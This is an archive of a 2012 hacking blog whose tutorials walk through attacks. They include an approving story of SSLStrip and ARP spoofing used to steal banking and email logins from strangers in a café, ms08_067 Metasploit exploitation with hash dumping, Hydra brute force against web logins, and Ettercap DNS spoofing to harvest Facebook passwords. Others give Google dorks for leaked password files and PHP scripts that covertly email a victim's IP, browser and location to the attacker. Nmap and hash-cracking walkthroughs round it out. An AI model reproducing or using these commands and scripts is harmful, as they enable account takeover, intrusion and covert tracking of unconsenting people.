010life - Because your 10nd life belongs here.: 2012

Wednesday, December 26, 2012

"And a happy new (F)ear!" ...SslStrip said !

Hello,
Merry Christmas everyone! Today, 26/12/12 I will tell you a story which Mr. F told me yesterday. Actually, it's a horror story, which none of us would like to be protagonist!

Sit comfortably and pay attention.

"Mr. F was on holidays (since 23/12/12) and he wanted to hang out for a coffee. He took his netbooks's case, he wore a jean and after an hour he was drinking a coffee at Syntagma square (Attiki - Syntagma, Athens). While he was listening to the well-known horrible music of the coffee shop, he decided to turn on his asus netbook and perform a simple Port Scan with his favorite port scanner, Nmap. At first, he didn't noticed anything, but after a while, a huge list of available host's was displayed in his 10.1 inch screen. 'Wow' , he said! 'It's my lucky day.' After that, a crazy idea crossed Mr. F's mind. He called John, (Best friend), to ask him for sending Sslstrip via Dropbox. I'm sure everyone knows what Mr. F will attempt to do. While he was waiting for the Sslstrip, he continued drinking his coffee and relaxing. Then, we pressed 'F5' on his Dropbox account, and he suddenly show an new folder named 'Sslstrip 0.9' with a tar.gz file inside. He extracted it, he checked if everything works great and he started thinking.

He didn't type anything for 2 minutes. He was thinking, what I must do now? The final thought was to enable port forwarding with the following command : $echo '1' > /proc/sys/net/ipv4/ip_forward . And that's what he entered. Then he checked if the ip_forward was '1' instead of '0'. 'Everything is ok', he thought. After a while, he typed the 2nd command: $iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080. 'With the above command , I will redirect requests from port 80 to port 8080 and I will be able to reassure the connections with destination the correct port'. After that, he was ready to type the 3rd command!

Read more : http://vishnuvalentino.com/hacking-tutorial/break-ssl-protection-using-sslstrip-and-backtrac

That was $arpspoof -i wlan0 -t 192.168.1.7 192.168.1.1 . With the above command he would be able to perform an ARP MITM attack between Target ( 192.168.1.7) and Host(192.168.1.1) . - You can easily notice that he didn't use broadcast arpspoof. The reason is that, he actually tried it, but the network was crashing! - 'Perfect!' he said, while he was watching the network traffic!

'I am ready', he said. 'I am ready to proceed to the final step!' Can you guess the final step? He only, had to make Sslstrip listening on port 8080. 'Very easy', he said. 'I only have to type : $ python sslstrip.py -l 8080 and then, I will wait as long as I need.'
He entered the command, he drunk his water ( He had already had his coffee) and he was waiting for the magic moment!

He made some calls, he browsed facebook, he played some mobile-games and after 20' he decided to stop sslstrip and he browsed the .log file. The results was awesome. Banking, Facebook, Ebay , Gmail, Hotmail account had been logged into Ssslstrip Log file! He was able to have access in any account. He was ready to buy products, browse emails, transfer money and other things!


Ebay account example

After he finished with that, he closed his netbook, he paid the waiter and he left the coffee shop by singing ' I wish you a Merry Christmas, I wish you a Merry Christmas ... and a Happy New (F)ear!!!'

Are you still here? Do you still feel safe with https? Mr. F hopes so. ;)

Thanks,
Nikos Danopoulos

Sunday, December 23, 2012

Password Cracking : John The Ripper & Hashcat!

Hello everyone,

Today, I'm gonna show you how to crack MD4, MD5, SHA1, and other hash types by using John The Ripper and Hashcat.

John The Ripper: "John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix systems, supported out of the box are Windows LM hashes, plus lots of other hashes and ciphers in the community-enhanced version."

Source: http://www.openwall.com/john/

Hashcat: "Hashcat is the world’s fastest CPU-based password recovery tool.

While it's not as fast as its GPU counterparts oclHashcat-plus and oclHashcat-lite, large lists can be easily split in half with a good dictionary and a bit of knowledge of the command switches."

Source: http://hashcat.net/wiki/doku.php?id=hashcat

Download John The Ripper(Jumpo 1.7.9) : John The Ripper Jumpo 1.7.9
Download Hashcat(0.41): Hashcat v0.41

Install both John and Hashcat and we are ready to start.
It's time to launch them. Go to the John's installation folder (JohnTheRipper-unstable-jumbo/run/) and type $./john to launch John.

Requirements for cracking a password with John: Wordlist, encrypted password.

Here is a site which you are able to convert a word into md5 hash.

In the following list you can find some great wordlists. ( I suggest you, to use an English dictionary as Wordlist )

ftp://ftp.cerias.purdue.edu/pub/dict/wordlists/
ftp://ftp.openwall.com/pub/wordlists/
http://www.skullsecurity.org/wiki/index.php/Passwords

Now, it's time to try cracking passwords with John. We will use those passwords-hashes

b326b5062b2f0e69046810717534cb09
d41134fbdb1aacda7ccdb49ed3d33948
37b4e2d82900d5e94b8da524fbeb33c0
4ed5d2eaed1a1fadcc41ad1d58ed603e
e09491aee3bd9ec02e805ffdac0beb12

Open your test.txt file and insert the above hashes. We also know that the passwords are using a Md5 encryption.
So we have a test.txt file with the hashes, and we know the md5 format of the hashes!

1st CHALLENGE:


$./john --format=raw-md5 --single test.txt

--format=raw-md5 is the format/type of the hash (md5 in this case)
--single is the single mode which John provide us for cracking passwords faster without using our wordlist

RESULT:

Loaded 5 password hashes with no different salts (Raw MD5 [128/128 SSE2 intrinsics 12x])

SCORE: Passwords 1 - 0 John

2nd CHALLENGE:

$./john --format=raw-md5 --wordlist=word_list_file.txt test.txt

--wordlist=word_list_file.txt is the command which we select our wordlist (change the "word_list_file.txt" with your wordlist's name

RESULT:

Loaded 5 password hashes with no different salts (Raw MD5 [128/128 SSE2 intrinsics 12x])
city             (4)
scary            (2)
observation    (5)
true             (1)
football         (3)

SCORE: Passwords 1 - 1 John the Ripper!

If you wish to see your cracked hashes you can type:
$./john --show --format=raw-md5 test.txt

What about cracking some SHA-1 hashes? For SHA-1 I will use the following hashes:

52c281dfd1301b71d268ecc736ee500502a2be87
14012cd1b375ede06f6334b34167397cb7be4265
0d612c12d2ac33625bf3e0351b6f5e4f73829fa8
8eec7bc461808e0b8a28783d0bec1a3a22eb0821
b363713a938afcd3c74603827fab79e935b2b09b

3rd CHALLENGE:

$./john --format=raw-sha1 --wordlist=wordlist_file.txt test.txt

--format=raw-sha1 the hash type is sha-1

Loaded 5 password hashes with no different salts (Raw SHA-1 [128/128 SSE2 4x])
auto             (?)
reincarnation    (?)
manual           (?)
respect          (?)
security         (?)

SCORE: Passwords 1 - 2 John The Ripper

Ok, now it's time to crack some passwords with Hashcat. We will use the same hashes with those we used before.

b326b5062b2f0e69046810717534cb09
d41134fbdb1aacda7ccdb49ed3d33948
37b4e2d82900d5e94b8da524fbeb33c0
4ed5d2eaed1a1fadcc41ad1d58ed603e
e09491aee3bd9ec02e805ffdac0beb12

1st CHALLENGE:

$./hashcat-cli32.bin 'test.txt' 'wordlistfile.txt'

'text.txt' is the file where the hashes are included
'wordlistfile.txt' is the wordlist

RESULT:

Added hashes from file test.txt: 5 (1 salts)

NOTE: press enter for status-screen

e09491aee3bd9ec02e805ffdac0beb12:observation
4ed5d2eaed1a1fadcc41ad1d58ed603e:city
b326b5062b2f0e69046810717534cb09:true
37b4e2d82900d5e94b8da524fbeb33c0:football
d41134fbdb1aacda7ccdb49ed3d33948:scary

All hashes have been recovered

SCORE: Passwords 0 - 1 Hashcat

2nd CHALLENGE:

$./hashcat-cli32.bin -m0 'test.txt' 'wordlistfile.txt'

-m0 is the format type of the hash. -m means that we want to crack a specific type of hash an 0 means that the hash type is MD5.

RESULT:

Added hashes from file test.txt: 5 (1 salts)

NOTE: press enter for status-screen

e09491aee3bd9ec02e805ffdac0beb12:observation
4ed5d2eaed1a1fadcc41ad1d58ed603e:city
b326b5062b2f0e69046810717534cb09:true
37b4e2d82900d5e94b8da524fbeb33c0:football
d41134fbdb1aacda7ccdb49ed3d33948:scary
All hashes have been recovered

SCORE: Passwords 0 - 2 Hashcat

3rd CHALLENGE:

In this challenge we will crack SHA-1 hashes. We will use the same hashes as before.

52c281dfd1301b71d268ecc736ee500502a2be87
14012cd1b375ede06f6334b34167397cb7be4265
0d612c12d2ac33625bf3e0351b6f5e4f73829fa8
8eec7bc461808e0b8a28783d0bec1a3a22eb0821
b363713a938afcd3c74603827fab79e935b2b09b

$./hashcat-cli32.bin -m100 'test.txt' 'wordlistfile.txt'

-m100 means that we want to crack SHA-1 hashes. 100=SHA-1

RESULT:

14012cd1b375ede06f6334b34167397cb7be4265:respect
0d612c12d2ac33625bf3e0351b6f5e4f73829fa8:auto
8eec7bc461808e0b8a28783d0bec1a3a22eb0821:security
52c281dfd1301b71d268ecc736ee500502a2be87:reincarnation
All hashes have been recovered

SCORE: Passwords 0 - 3 Hashcat

Many people believe, that Hashcut is faster and simpler. And that's true! After the above results, what's your opinion?

Thanks,
Nikos Danopoulos

Tuesday, December 4, 2012

Identify,scan & exlpoit a Windows system

Hello everyone,

    The following tutorial is based in a realistic scenario and I'm gonna show you how to identify,scan and exploit a Windows XP OS.
    The victim is running Windows XP OS and the attacker Linux Mint(Maya 13) OS.

    So, the first step is to identify the alive hosts in the attacking network. An alive host is a host which responds to an ICMP echo request(Ping). For further information about ICMP request, just have a look here( http://en.wikipedia.org/wiki/Internet_Control_Message_Protocol ).

     Let's say that the networks IP is 10.50.97.0/24 . Now, to find alive hosts you have to launch nmap ( http://nmap.org/ ) and performing a Ping scan by typing the following command:

    $ sudo nmap -v 10.50.97.0/24

The output should be something like this:

    The above command will start Nmap tool and perform an ping and port scan from host 10.50.97.0 to 10.50.97.255 .If you want to perform a ping scan just change -v with -sn .


    After finding the alive hosts we have to identify their Operating Systems. To do this just type:

$ sudo nmap -O [alive host's ip]

    With the above command you will ask for Operating System detection (-O). My output looks like this:

     After having a quick check in the output we can simply learn the target's OS.

    After identifying the host we have to scan it for open ports,services,vulnerabilities.You can check for open ports and services by typing :

$ sudo nmap -sV [target's ip].

    The above command probes open ports to determine service information.



   Now, after gathering useful information we are gonna perform a vulnerability scan for identifying open ports, more infos and common vulnerabilities which we are gonna try to exploit later.

   To do this, we have to launch a vulnerability scan with Nessus tool.

   Wait a couple of minutes.After vulnerability scan been completed check the report.


OK! Here are the infos we have:

1) Vulnerable Host's Ip
2) Target's Operating System
3) Services Informations
4) Open ports , other information , vulnerabilities

The next step, is to run the Metasploit Framework. With Metasploit we will exploit the vulnerabilities of the target.
So, after launching Metasploit we should select the exploit we need. (Check your nessus report for finding your exploit name). In this case, I'm gonna use the "ms08_067" exploit. To do this type in metasploit field :

"use exploit/windows/smb/ms08_067_netapi"

'use' is the command which says to metasploit which exploit to use.

Now, type "show options" to see your exploit's options.Fill the empty fields,such as "RHOST" ,"RPORT" etc. Like the following example:

After completing the above step it's time to run our exploit. To do this, just type "exploit" and wait for the exploit to run.

The following picture is an example of my metasploit session.

Once meterpreter session is opened you can easily get some screenshots of the target machine by typing
"screenshot" , show some passwords by typing "hashdump" and other cool thinks!

Have your coffee and enjoy your meterpreter session!

Thanks,
Nikos Danopoulos

Sunday, November 4, 2012

Dive into netdiscover tool

Hello,hello,

In this tutorial we are gonna talk and make an introduction on the Netdiscover tool.

What netdiscover is?!?

/* Netdiscover is an active/passive address reconnaissance tool, mainly developed for those wireless networks without dhcp server when you are wardriving. It can be also used on hub/switched networks.Built on top of libnet and libpcap, it can passively detect online hosts, or search for them, by actively sending arp requests, it can also be used to inspect your network arp traffic, or find network addresses using auto scan mode, which will scan for common local networks. */ So, that's what the official site of the netdiscover tool says about this
powerful tool. The developer is Jaime Peñalba.Netdiscover is available and you can download it here

So, when you are connected in a local network and you just want to now other host IP's, MAC and other typical information you can simple
run netdiscover via your terminal/konsole in Linux. It's very good, isn't it?

It's time for the "theory" part.
You may saw some unknown words before. Some of them may be "IP", "MAC", "arp requests". Here is the explanation of those words

/*1)Ip: (Internet Protocol) It's the protocol which is used for relaying packets through the internet . Ip also is a protocol on the DoD model at the "Internet Layer" and transfers data from the host to the destination based on the addresses.*/

/*2)Mac: Mac/physical address/hardware address/ Is a hexadecimal address like which is used for transfering packets to a destination.When
a host wants to send a packet at another host he has to know the MAC address,if he doesn't he has to call an *3)Arp requests. The arp request is a request which asks the MAC address of a host with a specific IP. Then the host with the X IP replies by answering his Mac address.*/

So let's dive into netdiscover tool

In the following scenario I use IP 192.168.1.67,so change my IP with yours.

$1) Type into terminal "$ netdiscover --help" to watch the available commands.Just have a look and we are gonna explain some of them.
$2) For finding other hosts you have to use your interface.My interface is wlan0,type "$ ifconfig" to check yours.
$3) After finding your IP and your interface type "$ netdiscover -i [interface goes here ] " The -i command specifies the interface that we are gonna use.So,by executing this command the netdiscover will show you the available IP's on your network between 192.168.0.0 until 192.168.255.255. But let's see what you will do if you want to use a specific range to scan

$4) For that you have to use the "-r" command.This will scan a given range instead of auto scanning.For example
"$ netdiscover -i [interface goes here ] -r 192.168.2.0/24" that means tha the netdiscover tool will scan between 192.168.2.0 until 192.168.2.255. If you want to scan between 192.0.0.0 and 192.255.255.255 use /8 instead of /16 or /24.

$5) If you have the IP's in a file you can simple use the "-l" command.This command loads the IP ranges that you have written in a file
and then executes a scan against them.

$6) If you wish only to sniff instead of sending something you can use the "-f" command.For example "$ netdiscover -i wlan0 -r 192.168.0.0/16 -p " .This command will just sniff.

$7) Another awesome command is the "-F" with this command you can customize the pcap filter expression.Default is arp.We said about arp's before at /*3)*/

$8) With "-s" command you are able to give the "sleep time" between each arp packet.

$9) You are allowed to customize the number of times to send an arp request with "-c" command.That's helpful when you have package loss

$10) You don't have many time?Just use "-f".That enables the fast mode scan;)

$11) With "-P" you can enable the result printing in a format suitable for parsing by another program

So,as you can see there are many options on netdiscover tool.It's useful and fast!I suggest you you to install it;)

Here are some snaps of the examples i used before...

Here we use the "-f" command for performing Fast scanning...The results are the some,but they are faster;)

Here you can see all the available commands and options on netdiscover tool,by running the "--help" command

In this picture we are using the "-r" command for specific range 192.168.0.0

Thank you,
Nikos Danopoulos

Monday, August 27, 2012

Hydra THC web form dictionary attack

Hello ,

In this tutorial i will show you how to use THC hydra for performing a dictionary attack against a web form.For example username,password form.

THC hydra is a powerful program that you can find it at Backtack OS.With Hydra you can perform a dictionary attack against http form,smb,routers and more.

#Step 1) So to start the attack you have to find a good wordlist.Wordlist is a txt/lst file with many complex word inside.(A good wordlist contains numbers,characters,letters).You can download a wordlist from the web or you can make your own wordlist.(Recommended).So download crunch(Wordlist creator from here install it go to the installation folder (crunch-3.3)and run the following command

cd crunch-3.3/

and then run:

./crunch 1 5 0123456789 > /root/Desktop/wordlist.txt

Your screen should look like this now

#Step 2)So once the wordlist is ready you have to run hydra thc and execute the attack.
Open hydra (Backtrack > Privilege Escalation > Password Attack > Online Attacks > hydra )

#Step 3)Now go to the login page of the target/site > right click > View page source , to view the source code of the forms.
You will see something like this(but of course different and not exactly like the following):

<form name="input" action="kwd.php" method="post">
Username:
<input type="text" name="user">

Password:
<input type="password" name="pass">

Just write the action page,the method,the username name and the password name in to a txt file to remember them.
Now before we finish we have to make a try with random password and username to take an error.(Don't forget to write the error message in the txt file.)Like this:


(In this case the error message/Wrong login is ACCESS DENIED).

Now it's time to perform the attack.Once we know the Username name the paswword name the action page and the method we are ready!

Now go to the hydra window (have a look at step 2 again) and type the following command

hydra www.site.com http-form-post "/directory:user=^USER^&pass=^PASS^:ERROR MESSAGE" -L /root/Desktop/wordlist.txt -P /root/Desktop/wordlist.txt -t 10 -w 30 -o /root/Desktop/attack.txt

You have to change the "www.site.com" with the target's site, the /directory
with the login page directory e.g index/Login.php the user with the username name of the site(Step 3) ,the pass with the password name of the site(Step 3) and the ERROR MESSAGE with the error message that the target gives you.In this case "ACCESS DENIED" e.g "Wrong username or Password" .

Thank you!

Nikos Danopoulos

Wednesday, August 8, 2012

Finding IPs via Gmail and with your own Php code!

Hello there:)

Today i will show you a tutorial about how to find an IP with Gmail and with your own Php code.First of all Php is a script language and you can find more about it here.There are many tutorials in the web too.

So, lets start. First of all you have to login you gmail account.If you don't have one just create one!(Very simple).
Second step is to find the hoobies of the target to send a realistic message.We only have to google his/her name or to read the 'About' choise at Facebook.
Now you have to send an email to the target and just wait for her/his reply!

Your screen should look like this....

Now open the 'Down button' as you can see in the following picture.

and just press the 'Show original'.Now you will see the following...


You can easy see the ip after 'Received: by....'

So you have found your targets ip!Congrats.

One more popular way to find an Ip is to make a script(8 lines) upload it to your webhost and then send the link to the target.Here is how you can do it.

First of all access your webhost account(I use 000webhost webhost,it is very good and free).Then make a file with the name news.php . Edit it an write the following code into the file.

<?php

$ip=$_SERVER['REMOTE_ADDR'];
$to='youremail ';
$from='me@gmail.com';
$subject='Ip';
$message=$ip;

mail($to,$subject,$message,$from);

?>Code explaination:
1line: Opening php
2line: We are telling to the programm that the parametr $ip is the ip of the visitor (target)
3line: $to parametr is your email
4line:$from parametr is the email sender name(me@gmail.com)
5line:$subject is the email's subject(Ip)
6line:$message is the email's message.In this case the message is the ip.
7line:Sending email...
8line:Closing program

Then send the link to your target.(www.domain.com/news.php).When he click it you will receive a message to your email account with his ip!

Your message!!

*IF you are using email account hotmail,you will receive the message to junks folder.

So,You have learned 2 ways for finding IPs.Enjoy it:)

Thank you,

Nikos Danopoulos

Monday, July 30, 2012

How can google dorks help us for performing web attacks

Welcome,
There are many times which a hacker is at home and ... trying to dinf sometrhing interesting to do.
Here a simple tutorial about how we can exploit google with some useful google dorks.If you don't know what google dorks are just read the following lines.

With google dorks you can find many vulnerabilities via searching on google.You type some specific commands in google search bar and then you can find some vulnerabilitites to many sites for many different vulns.

So have a look:

The following command is searching in Index Of of a site for 'phpinfo.php' file..

intitle:"Index of" phpinfo.php

You will see something like this in your screen

check the screenshot
We have found a file 'phpinfo.php'
in Index Of of a site...

You can also check the Apache version...It's an information!

So it's time to make a try for finding sqli vulnerabilities(Sqli Wikipedia)

There are some simple commands you can 'run' for finding sqli vulnerabilities.

ext:sql intext:@gmail.com intext:25d55ad283aa400af464c76d713c07ad

With this command we are searching for sql vulnerability ,we are searching for @gmail.com in the page and finally we are searching for 25d55ad283aa400af464c76d713c07ad which is an encrypted hash(12345678)

Also you can search for 'ext:sql intext:"INSERT INTO" intext:@gmail.com intext:password'

which is searching for INSER INTO in a webpage , for a gmail account and for password.You can replace gmail with hotmail/live/windowslive/yahoo and more.

So the most common dorks are 'inurl' which is searching for a keyword in the url, 'intext' which is searching for a text lines/keywords in the whole webpage , 'intitle' which is searching for a keyword in the webpage title, 'filetype' which is searching for a specific file type like .pdf .exe and more.You can use them for many reasons.They are very useful too..

So the final exaple is an example for 'Password files dorks'

Here are some dorks:
allinurl: auth_user_file.txt <=== This Dork is searching for auth_user_file.txt

filetype: xls inurl: "password.xls" <===This dork is searching for a file 'password.xls'
intitle:index.of pwd.db <== searching for password databases
index.of passlist.txt <=== searching for password list

There are many more.Just make a complex of keywords and use them.

Thank you

Nikos Danopoulos

Sunday, April 22, 2012

Php anonymous email sender and information gathering.Ohh yes!

Hello,Good morning!
Today (Sun Apr 22) you will see a powerful php script and html code for making 2 pages.The first page is an anonymous email sender,so you can send any email in all over the world with any email-name!
The second page is a page which collects all the information about the email sender.

Ok here is a few-lines story!
I give the email sender to a friend and i tell him/her "Hey this is an anonymous email sender.You can send mails everywhere!And of course with no name or with a fake name!Just open it".Let's say that your friend open the link and send an email...Then you will receive an email with the victims ip,location(city,region_name),his operating system(e.g Windows,Linux),his web browser(e.g Firfox,Opera,IE,Icweasel,Google Chrome),the victim which your friend sent the email and more.

Ok let's starts now.First of all you have to have a web host(I suggest you 000webhost(www.000webhost.com) or ripway(www.ripway.com)).They are both free.Now go to Desktop and make a new document.Open it and write into the fil the following code:

<html>
<body style="background-color:black">
<title>Email Anonymous Sender</title>
<form method="post" action="aaa.php">
<p style="font-style:italic;color:white">Victim's Email:<input type="text"name="email"></p>
<p style="font-style:italic;color:white">Subject:<input type="text"name="subject"></p>
<p style="font-style:italic;color:white">Message:<textarea name="message" rows="5" cols="55"></textarea>
<p style="font-style:italic;color:white">Your's Email:<input type="text"" name="myemail"></p>
<input type="submit" value="Submit"/>
<input type="reset" value="Erase All"/>
</form>

Ok now click on "save" and save it as "email.php"(WARNING:the name of the page is very important!Don't rename the page)

Now let's make the second page

Make a new document and type into the following code:
<?php
$ip=$_SERVER['REMOTE_ADDR'];
$browser=$_SERVER['HTTP_USER_AGENT'];
$br=$_SERVER['REMOTE_USER'];
$to=$_POST["email"];
$subject=$_POST["subject"];
$message=$_POST["message"];
$from=$_POST["myemail"];
$head="From:" . $from;
mail($to,$subject,$message,$head);
$mss="Ip:" . $ip;
$me="example@gmail.com";
$host="host info";
$json = json_decode(file_get_contents('http://freegeoip.net/json/'.$ip));
$region_name = !empty($json->region_name) ? $json->region_name : 'Unknown City';
$city =!empty($json->city)?$json->city:'Unknown City';
mail($me,$host,$mss . "," . "Victim's info:" . $browser . "" . "Location:" . $region_name . ":" . $city);
?>

<html>
<body style="background-color:black">
<h1 style="color:green">Let the games begin;) </h1>
<img src="https://encrypted-tbn3.google.com/images?q=tbn:ANd9GcSShwOxeW3aKl4VnV4cVMFE45ndqORlURwyxXl8ejE7x_UGS5O7" alt style="color:white"That's how you look now.."/>
</html>

As you can see i have colored one of the red lines green.This is because you have to put your email there instead of "example@gmail.com"
Ok now save this document as "aaa.php".So,now we are ready.

Go to your webhost(i use 000webhost) and go to file manager.Then select "public_html" and click on the button"upoload".Now you have to upload the files you made before.Just select them and click upload(If you are using 000webhost don't forget to click the "check" icon").

Ok now make a new tab with your web browser and type the following "mysite.net.76.net/email.php" (Be careful!Instead of mysite.net.76.net type in your website!)

Now send an email for testing.Just type your email in the Victim's Email and send an email.
Now go to your email an you will see something like this.

There are your information.The ip,th web browser,your location,your oprating system and more!Now your are ready to send it to a friend and have some fun!
Thank you,
Nikos Danopoulos

Saturday, April 21, 2012

Tut04:Ettercap(Scanning,attacking)

Hey!
With the following tutorial you will learn many thinks about ettercap.For example how to run an arp attack and how to scan for hosts and more.
Ok let's start.
First of all you have to download ettercap.Just be root(su) and then download ettercap with the following command apt-get install ettercap.
Before you start using ettercap you must learn what ettercap is!
Ettercap is a very powerful tool for mitm attacks(man-in-the-middle attacks)(http://en.wikipedia.org/wiki/Man-in-the-middle_attack).With ettercap you can do many tricks.For example sniffing on your network,dsn spoofing and more.

Now you are ready to see how ettercap works!

First of all open you terminal.Type "su" and your password to be root.

Here is a simple command for ettercap.

ettercap -T -M arp:remote -i wlan0 /192.168.1.1/ // -P remote_browser

Ok.Let's see what does this code do.
First of all with command "ettercap" we call ettercap to run.Then with the -T command is starting ettercap in a text-mode.
The -M command starts the Mitm(man in the middle) attack and the arp:remote is the kind of the poisoning.
The -i is the interface.Mine interface is eth1 but the yours may be wlan0(as on the example).
The /192.168.1.1/ // attacks at IP's between 192.168.1.1 to 192.168.1.254.
Finally -P command calls the plugin you want.In this case "remote_browser" a plugin which allows you to see the visited sites.

Another example is with the famous plugin dns_spoof.
With dns_spoof you can redirect the victim at any website.

Step 1)In terminal type "cd /usr/share/ettercap/" and then "nano etter.dns" to open the ttercaps dns file and edit.

By scrolling down you will see the following lines:

microsoft.com
*.microsoft.com
www.microsoft.com

A
A
PTR

198.182.196.56
198.182.196.56
198.182.196.56

Let's say that you want to redirect the victim from google to youtube.Just ping youtube by typing ping www.youtube.com in terminal and then change the etter.dns to
google.*   A   173.194.67.91
www.google.*   A 173.194.67.91
www.google.com PTR 173.194.67.91

The press Ctrl+O to sav the changes and thn Ctrl+X to exit.
Now type in terminal ettercap -T -M arp:remote -i eth1 /192.168.1.1/ // -P dns_spoof and the victim will be redirected to youtube.

Also you can type
facebook.*   A   your ip
www.facebook.*   A your ip
www.facebook.com PTR your ip

and if the victim connects to facebook,you will learn he's password and username:)

Thursday, April 12, 2012

Tutorial03:Nmap in ourdays

What about playing with nmap?A powerful tool for scanning your network!
(http://nmap.org/)

Nmap ("Network Mapper") is a free and open source (license) utility for network exploration or security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and official binary packages are available for Linux, Windows, and Mac OS X. In addition to the classic command-line Nmap executable, the Nmap suite includes an advanced GUI and results viewer (Zenmap), a flexible data transfer, redirection, and debugging tool (Ncat), a utility for comparing scan results (Ndiff), and a packet generation and response analysis tool (Nping).
Nmap was named “Security Product of the Year” by Linux Journal, Info World, LinuxQuestions.Org, and Codetalker Digest. It was even featured in eight movies, including The Matrix Reloaded, Die Hard 4, and The Bourne Ultimatum.
Nmap is ...

Flexible: Supports dozens of advanced techniques for mapping out networks filled with IP filters, firewalls, routers, and other obstacles. This includes many port scanning mechanisms (both TCP & UDP), OS detection, version detection, ping sweeps, and more. See the documentation page.
Powerful: Nmap has been used to scan huge networks of literally hundreds of thousands of machines.
Portable: Most operating systems are supported, including Linux, Microsoft Windows, FreeBSD, OpenBSD, Solaris, IRIX, Mac OS X, HP-UX, NetBSD, Sun OS, Amiga, and more.
Easy: While Nmap offers a rich set of advanced features for power users, you can start out as simply as "nmap -v -A targethost". Both traditional command line and graphical (GUI) versions are available to suit your preference. Binaries are available for those who do not wish to compile Nmap from source.
Free: The primary goals of the Nmap Project is to help make the Internet a little more secure and to provide administrators/auditors/hackers with an advanced tool for exploring their networks. Nmap is available for free download, and also comes with full source code that you may modify and redistribute under the terms of the license.
Well Documented: Significant effort has been put into comprehensive and up-to-date man pages, whitepapers, tutorials, and even a whole book! Find them in multiple languages here.
Supported: While Nmap comes with no warranty, it is well supported by a vibrant community of developers and users. Most of this interaction occurs on the Nmap mailing lists. Most bug reports and questions should be sent to the nmap-dev list, but only after you read the guidelines. We recommend that all users subscribe to the low-traffic nmap-hackersannouncement list. You can also find Nmap on Facebook and Twitter. For real-time chat, join the #nmap channel onFreenode or EFNet.
Acclaimed: Nmap has won numerous awards, including "Information Security Product of the Year" by Linux Journal, Info World and Codetalker Digest. It has been featured in hundreds of magazine articles, several movies, dozens of books, and one comic book series. Visit the press page for further details.
Popular: Thousands of people download Nmap every day, and it is included with many operating systems (Redhat Linux, Debian Linux, Gentoo, FreeBSD, OpenBSD, etc). It is among the top ten (rout of 30,000) programs at the Freshmeat.Net repository. This is important because it lends Nmap its vibrant development and user support communities.

information are based on nmap official site(www.nmap.org)

Let the games begin!

First of all open your Terminal get root previleges and type "apt-get install nmap"

Wait a couple of seconds and then you are ready for dive into nmap!

There two basic types of scanning with nmap tool.The first is -sT(TCP connect scanning) and -sS(SYN scanning)

You can run this scans by typing in Terminal "nmap -sT [targets ip]" or "nmap -sS [targets ip]"

You can also make Ping scan by typing this "nmap -sP [targets ip]" .With pinging a target actually you are sending an ICMP request packet to the target.If ICMP REPLY received the target is up,nmap will print on your terminal that your target is up.If you dont receive and ICMP REPLY ,means that target is down.

A very useful nmap command is also the -sV which collect information about a service in a port including the product name and version number.There is also the -sA(checks if a port is filterd or not) and the -O(Finds the OS of the target)

If you are "alergical" with terminal and command line you can use the -iL<file> command.This command allows you to make a fil(txt file) and write into the ip of the targets.The by typing in terminal nmap -iL filename.txt ,nmap will read the input from the file!

There are some example of the well-known nmap commands:

-sP

1 [chaos]# nmap -sP 10.0.0.0/24

   2 
   3 Starting Nmap 4.01 ( http://www.insecure.org/nmap/ ) at
   4         2006-07-14 14:19 BST
   5 Host 10.0.0.1 appears to be up.
   6 MAC Address: 00:09:5B:29:FD:96 (Netgear)
   7 Host 10.0.0.2 appears to be up.
   8 MAC Address: 00:0F:B5:96:38:5D (Netgear)
   9 Host 10.0.0.4 appears to be up.
  10 Host 10.0.0.5 appears to be up.
  11 MAC Address: 00:14:2A:B1:1E:2E (Elitegroup Computer System Co.)
  12 Nmap finished: 256 IP addresses (4 hosts up) scanned in 5.399 seconds

2)

-A(os fingrprinting) , -sS

1 [chaos]# nmap -sS -A 10.0.0.1
   2 
   3 Starting Nmap 4.01 ( http://www.insecure.org/nmap/ ) at
   4         2006-07-14 14:23 BST
   5 Insufficient responses for TCP sequencing (0),
   6         OS detection may be less accurate
   7 Interesting ports on 10.0.0.1:
   8 (The 1671 ports scanned but not shown below are in state:
   9         closed)
  10 PORT   STATE SERVICE    VERSION
  11 80/tcp open  tcpwrapped
  12 MAC Address: 00:09:5B:29:FD:96 (Netgear)
  13 Device type: WAP
  14 Running: Compaq embedded, Netgear embedded
  15 OS details: WAP: Compaq iPAQ Connection Point or
  16         Netgear MR814
  17 
  18 Nmap finished: 1 IP address (1 host up) scanned in
  19         3.533 seconds

Wednesday, April 11, 2012

Tutorial02:Dive into Firestarter

Μόλις είδατε απο το προηγούμνο tutorial τις φανταστικές κατα την γνώμη μου λειτουργίες του καινούργιου σας Firewall!

Δεν πιστεύετε και εσείς πως είναι ώρα να εμβαθύνουμε?"The well known as dive into firewall!"

Το μόνο που μένει ειναι να πλογηθούμε στο μενού *του* Debian απλά πατώντας Applications>Internet>Firestarter και θα δείτε το Firestarter να τρέχει.

Στο Firewall status πάνω-πάνω μπορούμε να καταλάβουμε αν το Firestarter τρέχει κανονικά.Αμέσως απο κάτω στο Network μπορούμε να καταλάβουμε τη interface έχουμε.Δίπλα ακριβώς μπορούμε να δούμε τα πακέτα που είσερχονται και εξέρχονται απο τον Υπολογιστή μας.Τέλος φαίνονται οι ενεργές συνδέσεις μας,οι πόρτες που τρέχουν ,τα Destinations αλλα και φυσικά τα Services και τα προγράμματα που εκτελούν το service!

Για να δούμε ομως και τις άλλες καρτέλες!

Η καρτέλα Events η οποία βρίσκεται στην κορυφή του Firestarter μας δείχνει ό,τι γίνεται μέσα στο δίκτυο και πιοιες λειτουργίες θεωρούντε επικίνδυνες,οι οποίες έχουν μπλοκαριστεί απο τον Firestarter.Aκόμα σε περίπτωση που κάποιος επιχειρήσει να σας επιτεθεί(για παράδειγμα port scanning,όχι μόνο δεν θα μπορέσει να τρέχει την επίθεση αλλα και το Firestarter θα σας ενημερώσει κατευθείαν εμφανίζοντάς σας ενα εικονίδιο στην κορυφή της οθόνης σας!

